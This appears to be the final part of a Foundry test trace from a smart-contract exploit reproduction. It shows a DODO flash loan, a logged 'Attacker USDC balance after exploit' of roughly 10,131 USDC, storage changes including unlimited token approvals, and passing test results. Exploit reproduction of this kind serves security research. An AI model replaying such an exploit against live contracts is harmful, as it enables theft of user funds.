    │   │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 8000000000 [8e9])
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [1222] USDC::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [557] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 10131590116 [1.013e10]
    │   └─ ← [Return] 10131590116 [1.013e10]
    ├─ [3042] USDC::decimals() [staticcall]
    │   ├─ [2382] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::decimals() [delegatecall]
    │   │   └─ ← [Return] 6
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Attacker USDC balance after exploit", val: 10131590116 [1.013e10], decimals: 6)
    ├─  storage changes:
    │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000000018de76816d8000
    │   @ 0x9a328ce9dd74780f134ac00bed7c0f1f4f68fcc80339507d08bb9234c103911d: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0xd073b71c72ccaea6d8214ddbd340726521813a393095925dc151e444ecfc6a2a: 0 → 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03
    │   @ 1: 0x0000000000000000000001010000000000000000000000000000000000000000 → 0x0000000000000000000000010000000000000000000000000000000000000000
    │   @ 33: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   @ 0: 0 → 0x000000000000000000000000000000000000000000013da329b6336471800000
    │   @ 0xd073b71c72ccaea6d8214ddbd340726521813a393095925dc151e444ecfc6a2d: 0 → 1
    │   @ 0x5a81487ee36dd29474ce7e17974478ea93a8e0120266ad4e0bc09406b69cec2c: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 42.13s (40.67s CPU time)

Ran 2 test suites in 43.38s (42.83s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
